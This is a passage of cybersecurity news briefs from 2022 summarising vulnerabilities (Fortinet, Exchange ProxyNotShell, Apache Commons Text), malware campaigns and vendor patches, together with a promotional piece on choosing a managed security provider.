address the risk. According to the information published by Microsoft, there is no indication that customer accounts or systems have been compromised, and they have indicated that all affected customers have been notified directly. More info → * * * Critical vulnerability in Apache Commons Text A critical vulnerability in Apache Commons Text has recently been disclosed. It would allow an unauthenticated attacker to remotely execute code (RCE) on servers running applications with the affected component. Identified with CVE-2022-42889 and a CVSS of 9.8, the flaw affects Apache Commons Text versions 1.5 to 1.9 and is located in insecure defaults at the time Apache Commons Text performs variable interpolation, which could lead to arbitrary code execution on remote servers. According to the Apache Foundation itself, the Apache Commons Text library is reportedly present in more than 2,500 projects and recommends upgrading as soon as possible to Apache Commons Text 1.10.0, which disables interpolators that present problems by default. On the other hand, several security researchers have pointed out the public availability of a proof of concept (PoC) for this vulnerability, a fact that considerably increases the risk. Other sources have even compared this bug to the well-known Log4j vulnerability, although it seems likely that its impact is less widespread and for the time being there are no reports of its possible active exploitation on the network. More info → * * * BlackLotus: highly sophisticated malware for sale in underground forums Security researchers have reportedly detected a threat actor selling a tool called BlackLotus on underground forums, with capabilities that have so far only been observed in state-sponsored groups and actors. This tool, a type of UEFI bookit, would be installed in the computer's firmware and would evade detection by security solutions by loading itself early in the device's boot sequence. According to the author of the tool in his publication, BlackLotus is said to have features to detect activity in virtual machines and has protections against removal, thus making malware analysis more difficult. Finally, security researcher Scheferman says that until a sample of the malware has been fully analysed, it cannot be ruled out that BlackLotus could be used to carry out a Bring Your Own Driver (BYOVD) attack. More info → * * * PoC available for critical Fortinet vulnerability Over the past few days, a proof-of-concept (PoC) has been published on GitHub that exploits the critical security flaw affecting Fortinet FortiOS, FortiProxy and FortiSwitchManager products that was reported over the past week under the coding CVE-2022-40684. Specifically, exploitation of this vulnerability could allow a remote attacker to perform an authentication bypass, deriving their actions in performing malicious operations on the administrative interface via HTTP(S) requests. In addition, according to Horizon3.ai, following an analysis of the PoC, they indicate that FortiOS would expose a management web portal, allowing the user to condiv the system. It is worth noting that when the PoC was published in open source, Fortinet had already reported active exploitation of the vulnerability. However, on Friday it issued an advisory that included mitigation guidance, as well as updates and fixes for customers. Finally, it is worth noting that researchers from GreyNoise and Wordfence have published detection of exploitation attempts. More info →

An Managed Security Service Provider (MSSP) offers you a team of seasoned security experts that will work for you at a fraction of the cost of building your security team in-house. Previously these providers served only large-scale industries or businesses, but now many MSSPs offer their services to small as well as medium-sized businesses. According to Gartner research, in 2021 the Managed Security Services (MSS) market grew 9.8% in U.S. Dollars, reaching $13.9 billion in revenue. The managed detection and response (MDR) segment witnessed a strong growth at 48.9% in U.S. Dollars. By 2024, more than 90% of buyers looking to outsource to security services providers will focus on threat detection and response services. But not every business has the workforce to find and resolve vulnerabilities and threats. Selecting a qualified, good-fit MSSP (managed security service providers) is a challenge. To help you choose a Managed Security Service provider, here are 5 things you should consider: 1. Managed Security Services Rankings Managed security service providers offer diverse interpretations of what Managed Security is, making it difficult to directly compare what providers deliver. Security and risk management leaders should recognize fundamental deliverables and align requirements to offerings. To facilitate the comparison between the different MSSP, there are specialized rankings such as the one published by MSSP Alert: Top 250 MSSPs -2022 Edition. The results rankings are based on: Annual recurring revenues Profitability Business Growth Rate Cyber professional headcount Managed security services offered MSSP Alert’s editorial coverage of MSSPs worldwide Third-party industry honors (ie Gartner, Forrester, IDC, etc…) Telefónica Tech USA ranked 5th in MSSP Alert's TOP 250 Global MSSPs list for 2022 published by MSSP Alert, a CyberRisk Alliance resource to identify the main providers of managed security services worldwide. The curated list identifies and honor the top MSSPs worldwide and will help enterprises evaluate and choose the MSSP that fit the most to their needs. 2. Simplify today’s cyber complex ecosystem As security providers landscape has become a vastfield with multiple actors, enterprises looks forward to reduce the time spent in integrations, vendor selection and qualification, hence facilitate the decision-making process. Having access to the best technologies and partners (and, thus, delegating updates, patches, bug fixing, etc.) is key to success. 3. Peace of mind of trusting an experienced partner Finding an MSSP partner who has the right expertise for your business can help you identify your vulnerabilities and mitigate quickly. Telefónica Tech is a Managed Security Services Provider (MSSP) with a heritage in managed services across data center, workplace, communications, and cloud. As such, we have deep subject-matter expertise across the entire threat landscape and operate security as a core discipline, from advisory services through to managed security engineering and operations. 4. Proprietary threat intelligence, advanced technology, and standardized procedures A managed security service provider (MSSP) provides outsourced monitoring and management of security devices and systems. Common services include managed firewall, intrusion detection, virtual private network, vulnerability scanning and anti-viral services. Hundreds of MSSPs now offer MDR services — however, Gartner says customers should be careful about pretenders in the market that have incomplete offerings. On the other hand, Telefónica Tech’s NextDefense Managed Service integrates Managed Detection and Response (MDR), Vulnerability Risk Management (VRM) and Cyber Threat Intelligence (CTI) with Digital Risk Protection (DRP) into a single solution that defends your cloud, corporate network, remote employees, digital assets, brand, and reputation. 5. Cost Control of your security operations and technologies When deciding on which MSSP to use, your top priority should be to find an MSSP who is both budget-friendly and provides value for your money. Great MSSPs will provide customizable pricing, with tailored solutions, specific to your business needs. Picking and choosing specific services can help you keep your budget contained and avoid paying for unnecessary products. Selecting an MSSP such as Telefónica Tech provides the technology, the experts and the processes at a fixed and predictable monthly cost and SLA without CAPEX investment needed. 🔵 Interested in talking to an expert? Contact our team.

Critical vulnerability in Fortinet Fortinet has issued a security advisory to its customers urging them to update their FortiGate firewalls and FortiProxy web proxy, in order to fix a critical authentication bypass vulnerability that could allow remote attackers to log into unpatched devices. The vulnerability has been identified as CVE-2022-40684. The vulnerability has currently no CVSS criticality associated with it according to the vendor, although some researchers estimate that it could reach a score of 9.8. The flaw resides in the administrative interface where, using alternative routes or channels in FortiOS and FortiProxy, an unauthenticated attacker could perform operations via specially crafted HTTP or HTTPS requests. The vulnerable versions are FortiOS 7.0.0 to 7.0.7, FortiOS 7.2.0 to 7.2.2 and FortiProxy 7.0.0 to 7.0.6 and 7.2.0, the vulnerability being fixed with the new versions FortiOS 7.2.1 y 7.2.2 and FortiProxy 7.2.1. Also, in case it is not possible to implement these updates, Fortinet has recommended limiting the IP addresses that can reach the administrative interface through a local policy, and even disabling remote administration interfaces to ensure that potential attacks are blocked until the update can be implemented. There are no reports of possible active exploitation of this flaw by threat actors so far, although according to the search engine Shodan, there are more than 100,000 FortiGate firewalls accessible from the Internet. More info → * * * LofyGang focuses on supply chain attacks Researchers at Checkmarx have published a report on a threat actor focused on supply chain attacks, known as LofyGang. According to Checkmarx, the group's latest campaign since 2021 is reportedly focused on infecting open-source software supply chains with malicious NPM packages. The attackers' objectives would be focused on obtaining credit card information, or stealing user accounts, including premium accounts for Discord, or services such as Disney+ or Minecraft, among others. In executing the attacks, they use all kinds of TTPs, including typosquatting, targeting typos in the supply chain, or "StarJacking", linking the URL of the legitimate package to an unrelated GitHub repository. The group, which is believed to be of Brazilian attribution, communicates mainly via Discord. They also have a YouTube channel and contribute to several underground forums under the nickname DyPolarLofy, promoting their tools and selling the credentials they have obtained. On the other hand, the group has a GitHub where they offer their open-source repositories offering tools and bots for Discord. It is worth noting that the Checkmarx researchers have created a website to keep track of updates on their findings and a repository of the malicious packages discovered so far. More info → * * * Emotet resurfaces with new evasion mechanisms Researchers at VMware Threat Analysis Unit have published a report analysing the resurrection of the group behind the Emotet malware-as-a-service (MaaS), known as Mummy Spider, MealyBug or TA542. This new resurgence of the malware comes on the heels of its dismantling by international law enforcement in January 2021. Researchers analysed data from spam emails, URLs and attachments collected from campaigns earlier this year, concluding that Emotet botnets are constantly evolving to make detection and blocking by defence teams more difficult. They do this by hiding their configurations, creating more complex execution chains and constantly modifying their command and control (C2) infrastructure. In addition, they have expanded and improved their credit card theft capabilities and their mechanism for lateral propagation. The distribution of the malware is based on mass mailings of emails with malicious links or attachments. More info → * * * Microsoft fixes 84 vulnerabilities in its Patch Tuesday, including two 0-day vulnerabilities Microsoft has fixed 84 vulnerabilities in its October Patch Tuesday, including two 0-day vulnerabilities. One of them actively exploited, and 13 critical flaws that would allow privilege escalation, impersonation or remote code execution. The actively exploited 0-day, identified as CVE-2022-41033 and CVSS 6.8, was discovered by an anonymous researcher and affects the Windows COM+ event system service, allowing an attacker to gain system privileges. On the other hand, the second 0-day, which, according to Microsoft, has only been publicly disclosed, has been catalogued as CVE-2022-41043 and with a temporary CVSS of 2.9. In this case, the bug consists of an information disclosure vulnerability in Microsoft Office that could allow an attacker to gain access to user authentication tokens. Regarding the other two recently known 0-days in the Exchange server (CVE-2022-41040 and CVE-2022-41082), Microsoft clarifies that it has not yet released security updates to address them and refers to its 30 September release, which includes guidance on how to apply mitigations for these vulnerabilities. More info → * * * Alchimist: new attack framework targeting Windows, Linux and macOS Cisco Talos researchers have discovered a new attack tool, with command and control (C2) capabilities, designed to target Windows, Linux and macOS systems. Named "Alchimist", the Cisco release notes that all of the tool's files are 64-bit executables and are developed in the GoLang programming language, features that facilitate compatibility with different operating systems. Its operation is based on a web interface that allows it to generate and condiv payloads deployed on infected devices to take screenshots, launch arbitrary commands and even execute code remotely. In addition, Alchimist is able to introduce a new remote access Trojan (RAT) called "Insekt" via PowerShell code for Windows, wget for Linux systems and, in the case of macOS, replaced by a privilege escalation exploit (CVE-2021-4034) in Polkit's pkexec utility. Once implemented, the Trojan will establish communication with the attackers' C2 infrastructure via the Alchimist interface and different communication protocols such as TLS, SNI, WSS/WS, its main purposes being information gathering and command execution. More info →

Lazarus targets Dell via new FudModule rootkit ESET researchers have reported a new Lazarus campaign targeting a Dell hardware driver using a new rootkit called FudModule. The rootkit uses a technique called bring your own vulnerable driver (BYOVD) to exploit a vulnerability in a Dell hardware driver for the first time. This technique, known as BYOVD, happens when malicious actors load legitimate, signed drivers into Windows that have known vulnerabilities. The campaign, aimed at espionage and data theft, was conducted via spear-phishing from autumn 2021, affecting targets in the Netherlands and Belgium. The malicious emails sent were presented as job offers, and deployed malware loaders (droppers), and customised backdoors. The most notable tool was a user-mode module that gained the ability to read and write kernel memory due to vulnerability CVE-2021-21551. This vulnerability affected a legitimate Dell hardware driver ("dbutil_2_3.sys") and has remained exploitable for 12 years until the manufacturer has issued security updates to fix it. More info ⇾ * * * Evolution of the Bumblebee malware Checkpoint researchers have published a study highlighting the constant evolution of this malware, which was discovered earlier this year. Checkpoint outlines several features that confirm the constant changes brought about by Bumblebee. These include the input vector used for distribution, most commonly injecting a DLL into an ISO file, however, this has been modified in the past by using a VHD file and has again reverted to ISO delivery via malspam campaigns. As a result, the researchers note the inclusion of checking mechanisms in sandbox environments, to prevent malware analysis. It is also estimated that, until last July, Bumblebee's Command & Control (C2) servers only accepted one infected victim on the same IP address, i.e., if several computers in an organisation accessing the internet with the same public IP are infected, the C2 server only accepted one, but now they can communicate with multiple infected systems on the same network. Finally, the researchers indicate that it is very likely that, depending on the network characteristics of the infected system, in later stages Bumblebee will deploy stealers or more complex post-exploitation tools such as CobaltStrike. More info ⇾ * * * Critical vulnerability in the PHP package repository Packagist The Sonar team has published the discovery of a new critical vulnerability affecting Packagist, the official package repository used by Composer, the world's largest PHP package manager. The security flaw, listed as CVE-2022-24828, CVSS of 8.8, allows arbitrary commands to be executed on the server running the Packagist instance. An attacker could exploit this vulnerability to modify the information in existing PHP software packages, even changing the download path of the packages. This type of attack is known as a supply chain attack, one of the most effective techniques. According to the researchers, of the two billion component downloads that are performed with Composer per month, approximately 100 million of these require the metadata provided by Packagist. The vulnerability was fixed immediately in an update in Composer versions 1.10.26, 2.2.12 or 2.3.5 More info ⇾ * * * ProxyNotShell: Bugs and fixes for Exchange vulnerabilities The Microsoft team has made publications about the vulnerabilities in Microsoft Exchange Server, classified as CVE-2022-41040 and CVE-2022-41082 although no patches have yet been released to fix these flaws. Pending such patches, Microsoft published a script to apply mitigations based on URL rewriting that, as published by some researchers, could be bypassed. In response, Microsoft corrected these temporary mitigations whose conditions, however, have been called into question again after researcher Peter Hiele demonstrated that one of them, string filtering in URI identifiers, did not consider the character encoding, which made Microsoft's measures do not work. This discovery was confirmed by other researchers, which has led to Microsoft once again having to correct its mitigations. In addition, researcher Kevin Beaumont pointed out that Microsoft's vulnerability disclosures are focused on protecting on-premises servers, leaving out those in hybrid configurations. In the meantime, attempts to scan for systems vulnerable to the flaws, known as ProxyNotShell, have been detected from IPs identified as malicious. Finally, the first attempts to sell exploits for the vulnerabilities via the GitHub platform have begun to be recorded. However, these exploits are turning out to be fake, constituting scam attempts in exchange for high sums of money in cryptocurrencies without the code being used to exploit ProxyNotShell. More info ⇾ * * * Newly published vulnerability in macOS Apple software analysis firm Jamf has published details of an investigation by its researcher Ferdous Saljooki on a vulnerability affecting the macOS operating system. The flaw lies in the Archive Utility function, which could allow unauthorised and unsigned malicious applications to run, bypassing all the protections and warnings that Apple usually includes. This is because the Archive Utility does not add the Apple-designed quarantine tag to files when trying to unzip files with two or more folders or subfiles in their root directory. Quarantine tags are normally included by the system when trying to run software that is untrusted or does not give information about its developer and causes it to undergo scanning and the user has to manually authorise it to prevent the installation of unwanted programs. Attackers could execute malicious software without the victim's control due to the absence of these labels. The vulnerability has been given the identifier CVE-2022-32910 and, although it was patched by Apple in bulletins in May and July, it has only become known in the last few days. More info ⇾

Two 0-day vulnerabilities exploited in Microsoft Exchange The Vietnamese cybersecurity team GTSC reported two 0-day vulnerabilities in Microsoft Exchange three weeks ago through the Zero Day Initiative (ZDI) that are reportedly being actively exploited by threat actors. Chaining both security flaws together would allow an attacker to remotely execute code (RCE) on compromised systems. Registered as CVE-2022-41040 and CVE-2022-41082, the first vulnerability consists of a server-side request forgery (SSRF) allowing an authenticated attacker to remotely trigger and exploit the second vulnerability. According to the researchers, active campaigns have been detected making use of the 0-days pair for the implementation of the popular web shell, China Chopper, on vulnerable servers. Once the system is compromised and persistence is achieved, the malicious script will collect information and move laterally to other systems in its victims' networks. Microsoft currently recommends considering implementing a temporary mitigation that would block attack attempts by adding a new rule in IIS via the URL Rewrite Rule module. More info ⇾ * * * Critical vulnerability in Sophos Firewall actively exploited Sophos has reported the discovery of a critical vulnerability affecting the Sophos Firewall User Portal and Webadmin which would allow an attacker to perform remote code execution (RCE). The security flaw, listed as CVE-2022-3236 with a CVSS of 9.8, is reportedly being used in campaigns primarily affecting organisations in the South Asia region, which have already been reported, the company said. Sophos has released fixes to address the vulnerability, which affects Sophos Firewall v19.0 MR1 (19.0.1) and earlier. Sophos Firewall applies the new versions by default without any action required from customers, users without this default setting enabled will need to manually upgrade to the new version. If this is not possible, the company advises disabling WAN access to the User Portal and Webadmin. More info ⇾ * * * Chaos: Versatile GO-based malware Researchers at Black Lotus Labs have released a statement with information about the Chaos malware, a new multi-functional GO-based botnet that is experiencing rapid expansion in recent months. First detected in April, Chaos is developed for Windows and Linux devices, with the ability to infect various types of architectures, has capabilities to perform DDoS attacks, cryptomining, establish persistence and propagate automatically, either by brute-force on private SSH keys or using stolen SSH keys. The malware has been associated with a Chinese threat actor, given the language in which it is written and the use of a Chinese-based command-and-control (C2) infrastructure. Although the victims of its attacks tend to be European, the bots are also being distributed across devices in the Americas and Asia, targeting a wide range of industries, as well as devices and systems not so closely linked to a business environment, such as SOHO routers, or the FreeBSD operating system. More info ⇾ * * * New malware on VMware ESXi with backdoor capabilities The Mandiant research team has discovered a new malware family targeting VMware system and aimed at installing multiple persistent backdoors on ESXi hypervisors. Mandiant links its discovery to the threat actor tracked as UNC3886, which appears to have focused on developing and deploying malware on systems that do not normally support EDR. The detected malware currently targets VMware ESXi, Linux vCenter servers and Windows virtual machines, and would allow transferring files between hypervisors and guest machines, modifying registries and executing arbitrary commands between virtual machines. It would also allow persistence as an administrator on infected systems by installing backdoors, named by researchers as VirtualPita and VirtualPie, via malicious vSphere installation packages ("VIBs"). More info ⇾ * * * WhatsApp fixes critical 0-day vulnerabilities Over the last few days, it has come to light that WhatsApp has fixed two 0-day vulnerabilities affecting Android and iOS versions that have received a CVSS rating of up to 9.8, making them critical. Both flaws, CVE-2022-36934 and CVE-2022-27492, would allow attackers to execute arbitrary code remotely. The first one is an Integer overflow vulnerability that allows code execution via a video call without the need for user interaction, by exploiting bugs in the Video Call Handler component code and is present in WhatsApp versions prior to v2.22.16.12. The second one is an Integer underflow flaw that, on the contrary, does require user interaction. The attacker will send a manipulated video file via WhatsApp that will allow the manipulation of Video Call Handler components and will cause additional memory corruption bugs. The versions of WhatsApp affected by this vulnerability are versions prior to v2.22.16.2 on Android and v2.22.15.9 on iOS. There are currently no known active attempts to exploit both flaws. More info ⇾

Quantum and BlackCat ransomware use Emotet as entry vector Researchers at AdvIntel have published the results of an investigation reporting that ransomware operators Quantum and BlackCat have adopted the use of Emotet as a dropper in their operations among their TTPs. Specifically, Emotet emerged in 2014 classified as a banking trojan, however, its evolution eventually turned it into a botnet that Conti ransomware operators used in their operations until June 2022, when it was disbanded. The methodology currently adopted by Quantum and BlackCat to use Emotet is to install a Cobalt Strike beacon that deploys a payload that allows them to take control of networks and execute ransomware operations. According to experts, Emotet has increased its activity since the beginning of the year by distributing itself via .lnk files, and it is estimated that more than 1.2 million computers are infected. This increase has also been corroborated by other research teams such as ESET and Agari. More info ⇾ * * * Revolut suffers data breach with more than 50,000 users exposed The online bank Revolut, which has a banking licence in Lithuania, has been the victim of a cyber-attack in which the personal information of more than 50,000 customers has been compromised. The incident, which occurred a week ago, has been described as "highly targeted". According to the Lithuanian Data Protection Agency, 50,150 customers have been affected, 20,687 of them belonging to the European Economic Area. At this stage, details of how the attacker gained access to the bank's database have not been disclosed, but all indications are that the threat actor relied on a social engineering attack as an entry vector. The Agency notes that the information exposed includes: email addresses, first and last names, postal addresses, phone numbers, limited payment card details and account details. Revolut has issued a statement saying that the personal data compromised varies from customer to customer and that no card details or passwords have been accessed. More info ⇾ * * * Critical vulnerabilities in industrial control system environments The Cybersecurity and Infrastructure Security Agency (CISA) has issued a total of eight security advisories warning of vulnerabilities in industrial control systems (ICS), including critical flaws affecting Dataprobe iBoot-PDU products. It should be noted that power distribution units (PDUs) are used to remotely manage the power supply of systems commonly used in critical infrastructures. Claroty security researchers discovered a total of seven vulnerabilities in the Dataprobe product, including CVE-2022-3183 and CVE-2022-3184 with a CVSS of 9.8. These security flaws could allow malicious actors to access unauthenticated users and remotely execute code on affected systems. David Weiss, CEO of Dataprobe, has indicated that the security issues have been patched in version 1.42.06162022 and that others are fixed by proper configuration such as disabling SNMP, telnet and HTTP. More info ⇾ * * * Old Python vulnerability affects thousands of repositories Researchers at Trellix have released details of the exploitation of a vulnerability in the Python programming language that has been overlooked for 15 years. The bug could affect more than 350,000 open-source repositories and could lead to code execution. The report explains that they rediscovered the vulnerability while reviewing other unrelated bugs, concluding that it was CVE-2007-4559, already documented in an initial report in August 2007, and which has remained unpatched to this day. Only during the year 2022, from the Python Bug Tracker, was an update provided to the documentation that only warned developers about the risk. For its part, Trellix points out that the bug persists, providing explanatory videos on how to exploit it. The vulnerability is in the extract and extractall functions of the tarfile module, which would allow an attacker to overwrite arbitrary files by appending the sequence "..." to filenames in a TAR file. In addition, Trellix has announced patches for just over 11,000 projects, although, for the moment, the Python Software Foundation has not commented on the vulnerability, so extreme caution is recommended as this is a bug that represents a clear risk to the software supply chain. More info ⇾ * * * Chromeloader malware increases its activity and boosts its capabilities Researchers from Microsoft and VMware have reported a malicious campaign by the Chromeloader malware, a malicious extension for the Chrome browser, aimed at infecting victims' devices with multiple malicious programs. During the first quarter of 2022, Chromeloader came to the limelight in the form of adware and later became a stealer specialising in stealing data stored in the browsers of targeted users. However, according to Microsoft, there is currently an ongoing campaign attributed to the threat actor tracked as DEV-0796, which makes use of this malware to launch much more powerful and targeted payloads. Chromeloader has been found to be deployed in ISO files that are distributed via malicious advertisements and YouTube video comments. In addition, as VMware also details in its report, there are at least 10 variants of this malware camouflaged under utilities intended to manage movie subtitles, music players and, more worryingly, a variant of Chromeloader that implements the Enigma ransomware in an HTML file. More info ⇾

Microsoft fixes two 0-day and 63 other vulnerabilities in Patch Tuesday Microsoft has fixed 63 vulnerabilities in its September Patch Tuesday, including two 0-days, one of them actively exploited, and another five critical flaws that would allow remote code execution. The actively exploited 0-day, identified as CVE-2022-37969 and CVSS 7.8, was discovered by researchers from DBAPPSecurity, Mandiant, CrowdStrike and Zscaler and affects the Common Log File System (CLFS), allowing an attacker to gain system privileges. On the other hand, the second 0-day that has not been exploited is listed as CVE-2022-23960 and with CVSS 5.6, and it refers to a cache speculation restriction vulnerability. Microsoft Dynamics CRM (CVE-2022-35805 and CVE-2022-34700), 2 others in IKE (CVE-2022-34722 and CVE-2022-34721) and, finally, a flaw in Windows TCP/IP (CVE-2022-34718), all of which would allow remote code execution. More info → * * * Analysis of the OriginLogger keylogger Researcher Jeff White from Unit 42 in Palo Alto has published the results of his recent analysis on the OriginLogger keylogger, which is considered to be the heir to Agent Tesla. It is used to steal credentials, screenshots and all kinds of device information and is for sale on sites that specialise in spreading malware. Its infection chain is initiated through different types of droppers, but usually a Microsoft Office document with malicious macros, which redirect to a page from which a file with an obfuscated script is downloaded, used at the same time for downloading a payload that will be used to create persistence and schedule different tasks. The payload will also contain PowerShell code and two encrypted binaries, one of which is a loader and the other the actual OriginLogger payload. Another feature that makes OriginLogger a separate version of Agent Tesla is the variety of data exfiltration methods, using SMTP and FTP protocols and servers, web pages with their own panels or Telegram channels and bots. More info → * * * Lampion malware distributed in new phishing campaign Cofense researchers have analysed a phishing campaign distributed by email, in which the attachment contains a script that downloads and executes the Lampion malware. This malware, discovered in 2019, corresponds to a banking trojan that seeks to steal information from the infected device. It connects to its command-and-control (C2) server and is able to superimpose a page on top of banking login forms to get the user's information. As for the campaign, it is distributed by sending via stolen corporate accounts various fraudulent emails, which attach malicious payment proofs hosted on WeTransfer and urge them to be downloaded. Once the recipient of the fraudulent email downloads the malicious document and opens it, several VBS scripts are executed and the attack chain begins. It is worth noting that Lampion focuses mainly on Spanish-speaking targets, abusing cloud services to host the malware, including Google Drive and pCloud. More info → * * * SAP Security Bulletins SAP has issued 16 security advisories on its September Security Patch Day, fixing 55 Chromium and other high-priority vulnerabilities. First, SAP is issuing security updates for the Google Chromium browser that affect several versions of SAP Business Client. On the other hand, among the high priority vulnerabilities fixed is an XSS vulnerability affecting SAP Knowledge Warehouse, identified as CVE-2021-42063 and with CVSS 8.8. Also among the most critical is CVE-2022-35292, with CVSS of 7.8, which affects the service path in SAP Business One and would allow privilege escalation to SYSTEM. The second priority note corresponds to the SAP BusinessObjects service, affected with two vulnerabilities, one of them, with CVE-2022-39014 and CVSS 7.7, would make it possible for an attacker to gain access to unencrypted confidential information; while the other vulnerability, designated with CVE-2022-28214 and CVSS 7.8, corrects for the possibility of information disclosure in the service. A related vulnerability update, CVE-2022-35291 and CVSS 8.1, affecting SuccessFactors is published, which resumes the functionality of file attachments. More info → * * * Webworm activity analysis Symantec's threat research team published a post yesterday detailing the activities of a group called Webworm, which reportedly has the same TTPs and devices in use as the threat actor known as Space Pirates, leading researchers to believe they could be the same group. According to the investigation, the group has been active since 2017 and has been engaged in attacks and espionage campaigns against government agencies and companies in the IT, aerospace and energy sectors, especially in Asian countries. Among its usual resources are modified versions of the Trochilus, Gh0st RAT and 9002 RAT remote access trojans, used as a backdoor and spread via loaders hidden in fake documents. It is worth noting that the RATs used by Webworm remain difficult to detect by security tools, as their evasion, obfuscation and anti-analysis tricks are still remarkable. More info →

Critical vulnerability in Atlassian Bitbucket Server and Data Center Atlassian has recently warned its users about a new critical vulnerability affecting the Bitbucket Server and Data Center software, which shall be patched inmediately. The flaw, CVE-2022-36804, has a CVSS v3 of 9.9 according to Atlassian, and it allows command injection through especially crafted http requests, which open the way for remote code execution. The exploitation of the vulnerability is not complex and does not requiere high privileges. The attacker would only need reading rights in public or private repositories and would never need to interact with the user. The versions of Bitbucket Server and Data Centers affected by the flaw are all from 6.10.17 to 8.3.0, and patches have already been published for versions 7.6.17, 7.17.10, 7.21.4, 8.0.3, 8.1.3, 8.2.2, and 8.3.1. 6.X versions will not be patched. For all users who cannot patch this issue at the moment, Atlassian recommends to close public respositories temporarily. Meanwhile, Max Garret, the researcher who found this vulnerability and reported it to Atlassian, has promised to deliver a PoC in 30 days, and has claimed that Atlassian's patch should not be very difficult to circumvent. Mofe info → * * * Intellexa offers a 0-day exploit for iOS and Android A document property of Israeli-based company Intellexa has recently been leaked, uploaded on Twitter by VX-underground's profile, it shows a commercial offer of a spyware for a price of 8 million euros. The spyware works on iOS version 15.4.1 and Android version 12 and, since it is a 0-day, it is unlikely to be patched and not work on either of the new versions of these operating systems. This exploit allow remote access to the data of the impacted devices. The infection attack vector, according to the document, would be a link that needs to be clicked in order to inject the payload into the device. Also, the offer includes a one-year warranty, a platform to analyze the extracted data, as well as ten types of concurrent infections and a catalogue of a hundred other successful infections as examples. More info → * * * Use of Log4j vulnerabilities against targets in Israel Microsoft has published details of a recent investigation carried out in their Threat Intelligence Center (MSTIC), which informs on a wave of attacks by the MuddyWater (dubbed as Mercury by Microsoft) threat actor against targets in Israel. According to the researchers, this actor has been using the popular Log4shell vulnerability to compromise unpatch software. This time, attacks were mainly aimed at SysAid, an IT management program, instead of attacking WMware software as has been traditionally used in these attacks. MuddyWater exploited the vulnerabilities as initial point of entry into the victim's system, in which they would then run web shells to execute different malicious commands, create users with admin privileges, steal credentials via Mimikatz, and move laterally via tools such as RemCom or Windows Management Instrumentation. To avoid these attacks, Microsoft recommends applying the patches for this set of vulnerabilities, already available since January 2022. More info → * * * More than 1,000 iOS apps found exposing encrypted AWS credentials Researchers from Symantec's Threat Hunting team have detected nearly 2,000 mobile apps containing encrypted AWS (Amazon Web Services) credentials. Most of the apps (1,856) correspond to the iOS system, while only 37 belong to Android. 77% of the apps have been confirmed to include valid AWS access tokens that could be used to directly access private cloud services. In addition, those valid AWS tokens could be used by an attacker to access cloud instances where active service databases containing millions of records, including user account details, internal communications and other sensitive data, are located, depending on the type of application. Symantec's research is intended to warn mobile app developers of the dangers of overreliance or insecure practices that expose AWS credentials, which could make the mobile app supply chain vulnerable, as well as open the door for malicious actors to private databases, leading to potential data breaches and exposure of end users' personal data. More info → * * * Google patches 24 vulnerabilities in Chrome Google's latest security bulletin has fixed 24 vulnerabilities, including a critical flaw (CVE-2022-3038), and has added the sanitizer system in order to protect users from XSS injection attacks. Most of the patched vulnerabilities were due to memory management issues, with use-after-free and buffer overflow flaws that impacted complements such as WebUI and Screen Capture. Google has also corrected several security policies and incorrect implementation vulnerabilities. It is worth noting that while there may not be evidences that these vulnerabilities are being actively exploited, there is a serious unpatched vulnerability affecting the operative system clipboard through Chromium-based browsers, and that it can be exploited with no authorization or interaction from the user. Google also recommends installing the browser’s latest version to fix these flaws More info →

Google reports largest DDoS attack in history Google researchers have reported the largest DDoS attack ever recorded. Last 1 June, a Google Cloud Armor client received a series of HTTP DDoS attacks, which reached 46 million requests per second (RPS). This layer 7 DDoS attack has become the largest attack of its kind, being 76% larger than the largest known attack to date. According to the researchers, the attack was executed from 5,256 IP addresses spread across 132 countries, taking advantage of encrypted (HTTPS) requests. Furthermore, 3 per cent of the requests were executed from Tor exit nodes. Researchers have determined that the geographical distribution and the types of unsecured services leveraged to generate the attack match the Mēris botnet attack family. The attack lasted approximately 69 minutes and was stopped when, the researchers believe, the actor realised that the attack was not having the expected impact given the resources employed. Cloud Armor was able to block the attack and the victim was able to keep the services online. More info → * * * Cisco suffers cybersecurity incident Cisco has issued a statement confirming that it was the victim of a data compromise at the end of May, on the 24th. According to the company, the entry vector was the theft of an employee's Google credentials stored in the browser. They used social engineering and phishing attacks to get the employee to accept malicious multi-factor notifications, thus gaining access to the corporate VPN and escalating privileges from it. The Yanluowang ransomware group has also claimed responsibility, confirming that the data breach involved 2.75GB of information in 3,100 files in an email sent to Bleeping Computer, claiming responsibility and providing evidence. On the other hand, Cisco says that the attackers were only able to steal non-sensitive data from a folder linked to the compromised employee's account, adding that they found no evidence that they managed to access critical internal documentation such as that related to product development, sensitive customer or employee data, and claims that the ransomware would not have been deployed as they have not suffered encryption of any of their data. More info → * * * 11 vulnerabilities in Chrome fixed Google has released Stable Channel version 104.0.5112.101 for Mac and Linux, and version 104.0.5112.102/101 for Windows, which fixes a total of 11 vulnerabilities. Among these vulnerabilities, the one catalogued as CVE-2022-2856 stands out, due to the fact that its active exploitation has been detected. This vulnerability was discovered by Google Threat Analysis Group researchers Ashley Shen and Christian Resell, and involves poor validation of untrusted inputs in Intents. On the other hand, vulnerability CVE-2022-2852 is also worth mentioning, as it has been classified as critical. This vulnerability was discovered by Sergei Glazunov of Google Project Zero, being a use after free flaw in FedCM. Google has not provided further details of the vulnerabilities so far in order to allow the majority of users to upgrade. More info → * * * Microsoft warns of ongoing phishing campaigns by SEABORGIUM actor Researchers at the Microsoft Threat Intelligence Center (MSTIC) have issued an advisory warning of new phishing campaigns by the threat actor SEABORGIUM, also known as ColdRiver or TA446. These campaigns are reportedly mainly targeting NATO organisations and NATO members to obtain sensitive information, although Microsoft has detected attacks against countries in the Baltics, Nordic and Eastern Europe. SEABORGIUM mainly targets defence and intelligence companies, non-governmental organisations (NGOs) and intergovernmental organisations (IGOs), think tanks and higher education. SEABORGIUM operators use social engineering to trick their victims with fraudulent social media profiles to carry out credential theft, which ultimately ends with the sending of phishing emails with malicious URLs or attachments where the victim enters their credentials. More info → * * * New ransomware GwisinLocker Security researchers have tracked down a new ransomware family, called GwisinLocker, targeting South Korean healthcare, industrial and pharmaceutical companies. It has the ability to encrypt Windows and Linux servers, including ESXi servers and virtual machines. Operated by the threat actor Gwisin, which means "ghost" or "spirit" in Korean, it is believed, based on ransom note data, to be in the hands of an advanced persistent threat (APT) group linked to North Korea. On Windows devices, the infection is initiated by the execution of an MSI installer that requires special parameters in the command console to execute the DLL file included in the MSI itself. This DLL will perform encryption actions by injecting itself into a Windows system process, thus evading detection by antivirus systems. It also supports a function to encrypt files in safe mode. Regarding the Linux version, the analysed sample suggests that it is a sophisticated malware with features particularly designed to manage Linux servers, targeting VMware ESXi virtual machines. Notably, GwisinLocker combines AES symmetric 